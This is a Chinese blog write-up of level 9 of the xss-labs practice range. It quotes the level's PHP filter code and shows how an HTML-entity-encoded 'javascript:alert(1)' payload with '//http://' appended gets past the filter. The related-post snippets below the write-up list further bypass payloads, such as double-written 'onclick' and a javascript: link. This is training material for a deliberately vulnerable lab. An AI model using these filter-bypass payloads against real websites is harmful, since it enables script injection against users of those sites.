xsslabs第九关

于 2024-03-04 11:48:51 发布
阅读量391 收藏 6
点赞数 10
分类专栏: xss 文章标签: javascript 安全 xss 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63750160/article/details/136447389
版权
本文详细解释了如何在PHP代码中检测链接合法性,同时展示了防止跨站脚本攻击(XSS)的技巧,通过字符串替换隐藏payload并检查其长度。
摘要由CSDN通过智能技术生成

沿用第八关的思路 

javascript:alert(1)

 

显示我的链接并不合法 

 

我们看一下部分源码

 

 <!DOCTYPE html><!--STATUS OK--><html>
<head>
<meta http-equiv="content-type" content="text/html;charset=utf-8">
<script>
window.alert = function()  
{     
confirm("完成的不错!");
 window.location.href="level10.php?keyword=well done!"; 
}
</script>
<title>欢迎来到level9</title>
</head>
<body>
<h1 align=center>欢迎来到level9</h1>
<?php 
ini_set("display_errors", 0);
$str = strtolower($_GET["keyword"]);
$str2=str_replace("script","scr_ipt",$str);
$str3=str_replace("on","o_n",$str2);
$str4=str_replace("src","sr_c",$str3);
$str5=str_replace("data","da_ta",$str4);
$str6=str_replace("href","hr_ef",$str5);
$str7=str_replace('"','&quot',$str6);
echo '<center>
<form action=level9.php method=GET>
<input name=keyword  value="'.htmlspecialchars($str).'">
<input type=submit name=submit value=添加友情链接 />
</form>
</center>';
?>
<?php
if(false===strpos($str7,'http://'))
{
  echo '<center><BR><a href="您的链接不合法?有没有!">友情链接</a></center>';
        }
else
{
  echo '<center><BR><a href="'.$str7.'">友情链接</a></center>';
}
?>
<center><img src=level9.png></center>
<?php 
echo "<h3 align=center>payload的长度:".strlen($str7)."</h3>";
?>
</body>
</html>

这http:// 

 

&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#49;&#41;//http://

 

 

万能小硕
关注
  • 10
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xssgame第九至第十
学习
10-08 2096
第九 这一,我发现无论我输入什么,都是不合法链接 另外,"和>都被过滤了 两项对比 只是少了一个http,就显示不合法链接,问题就出在 http:// 这个身上 所以我们要在输入的语句中添加http:// 比如javascript:alert('1')//http:// ...
XSS-labs1-20通过手册
rumil的博客
09-21 1703
ng-include指令一般用于包含外部HTML文件,ng-include属性的值可以是一个表达式,返回一个文件名,但是默认情况下,包含的文件需要包含在同一域名下,也就是要调用同一域名下的其他网页。通过代码发现,本卡有两个参数:arg01、arg02,当我们发送的时候,发现他们是会互相拼接起来的,那么我们就容易想到这里会不会就是突破口,发现这两个参数是在embed上,embed标签定义嵌入的内容,并且做了尖括号过滤,那么我们可以加入一个属性进去,生成恶意代码。被HTML实体编码了,成了实体字符。
XSS-9注入靶场闯(小游戏)——第九
qq_39330735的博客
02-04 590
XSS-9注入靶场闯(小游戏)——第九,绕过后台字符串过滤,找出过滤条件,夹带过滤条件进行Payload
XSS-labs靶场实战(四)——第9-11
永远是少年
11-18 607
今天继续给大家介绍渗透测试相知识,本文主要内容是XSS-labs靶场实战第9-11。 一、第九 二、第十 三、第十一
当黑客就入门 XSS-Lab第九
Tuye的博客
07-21 666
第一:判断是否存在注入漏洞 第二:尝试利用该漏洞 所以构造Payload,使用html实体编码,引入正常的url并对此进行注释 javascri&#x0070;t:alert(1)/*http://www.baidu.com*/ ...
XSSxss-labs-level9
Hugu
02-23 630
文章目录0x01 XSS-Labs0x02 实验工具0x03 实验环境0x04 实验步骤0x05 实验分析0x06 参考链接 0x01 XSS-Labs   XSS(跨站脚本攻击)是指恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的目的。   XSS按照利用方式主要分为:反射型XSS、存储型XSS、DOM型XSS。反射型XSS是攻击者事先制作好攻击链接, 需要欺骗用户自己去点击链接才能触发XSS代码(服务器中没有这样的
xsslabs.zip
07-23
"xsslabs.zip" 是一个由国内知名安全专家开放的XSS漏洞靶场,为网络安全从业者和爱好者提供了一个实战学习和测试XSS攻击方法的平台。通过这个靶场,我们可以深入了解XSS的类型、攻击方式以及如何有效地进行防护。 ...
XSSlabs通手册
04-25
XSSlabs通手册详细介绍了如何利用和防止这类攻击。 在Level 1,我们了解到基础的XSS注入方式,即直接在URL参数中插入JavaScript代码,例如`<script>alert(1)</script>`。然而,这种直白的尝试通常会被服务器端的...
PHP、Apache环境中部署xsslabs(XSS跨站脚本攻击靶场)
01-08
下面是部署xsslabs的详细步骤和相知识点: 1. 环境安装 在开始部署xsslabs之前,需要安装PHP和Apache环境。PHPStudy是一个集成了PHP、Apache、MySQL等多种服务的集成开发环境,非常适合开发和测试环境。可以根据...
135-PHP、Apache环境中部署xsslabs
最新发布
10-22
以下是部署 xsslabs 的详细步骤: PHP 和 Apache 环境的安装 在部署 xsslabs 之前,需要先安装 PHP 和 Apache 环境。可以参考《01-Windows 安装 phpstudy》中的教程进行安装。 下载 xsslabs 工程 下载 xsslabs ...
光棍节程序员闯秀_第九解密内容
11-18
光棍节程序员闯秀_第九解密内容,中间的解题结果放在附件中,方便大家来对照。
XSS-Game level 9
热门推荐
wangyuxiang946的博客
07-08 1万+
xssgame9,XSS-Game第九过滤的很严 , 使用编码绕过
xss-labs靶场训练(5-9
ldzhhh的博客
05-21 590
第一 先试一下经典的payload: 这里把script过滤了 onclick也被过滤了 onmouseover也同样被过滤了,尝试用标签执行javascript:伪协议。 Payload: ”><a href=javascript:alert()>xss</a>` 点击一下搜索按钮左侧的xss就成功弹窗了 后台键代码: <?php ini_set("display_errors", 0); $str = strtolower($_GET["keywor
xsslabs通
qq_61774705的博客
07-15 644
两个地方都用了htmlspecialchars($str),它的作用是将特殊符号转换成HTML实体,就是HTML为了防止特殊符号,如"
XSS-labs靶场通笔记7-9
m0_65614852的博客
03-10 243
第七 通过返回的html代码发线标签里的字母没了......也就是被过滤掉了,script是一个字母都没剩下啊; 在尝试上一的payload; on也没了,那么我写两遍呢,再试试; 可以!构造本payload: "oonnclick="alert() //双写绕过 注意双写时注意,不是<ssccrriipptt>不是这样的双写 ,<sscriptcript>这样才是对的 后台在检索你的上传的数据是会过滤你的键字 on 或 script 只要.
XSS-labs靶场过秘籍(level 9-12)
qq_45741871的博客
09-21 1359
xss-labs靶场过秘籍
【网络安全 --- xss-labs靶场通(1-10)】详细的xss-labs靶场通思路及技巧讲解,让你对xss漏洞的理解更深刻
m0_67844671的博客
10-21 5039
【网络安全 --- xss-labs靶场通(1-10)】详细的xss-labs靶场通思路及技巧讲解,让你对xss漏洞的理解更深刻
xss challenges闯 1-10
夜思红尘的博客
04-12 442
xss challenges闯 1-10
[网络安全]xss-labs level-9 解题详析
等风来
08-04 2463
Burp Suite 的 “Encoder” 模块允许用户对数据进行各种编码和解码操作,以进行安全测试、漏洞利用或其他目的。而将 JavaScript 代码放在 href 属性中,当用户点击具有此链接的元素时,浏览器会执行其中的 JavaScript 代码。Burp Suite 中涉及到编码和解码的模块是 “Encoder”(编码器)。该题与 level-9 的区别是,加上了对地址的判断。也就是说我们填入的内容存在于。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值